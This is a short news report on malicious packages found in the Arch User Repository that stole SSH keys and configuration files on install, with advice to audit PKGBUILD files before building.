• •Security researchers identified at least two malicious packages within the Arch User Repository (AUR) in the last seven days
• •Affected packages were designed to exfiltrate sensitive system configuration files and SSH keys upon installation
• •Users are advised to manually audit PKGBUILD files before building any software, as the community-driven nature of the repository lacks automated security vetting

The Arch User Repository (AUR) has been compromised by malicious software for the second time in a single week. Unlike official distribution repositories, the AUR relies on community maintenance and lacks centralized security verification, which allowed the harmful scripts to bypass standard checks. While developers have removed the identified threats, the exact scope of how many users may have been impacted remains unconfirmed. Arch Linux users can mitigate risk by inspecting build scripts before installation and avoiding packages with recent or suspicious upload histories.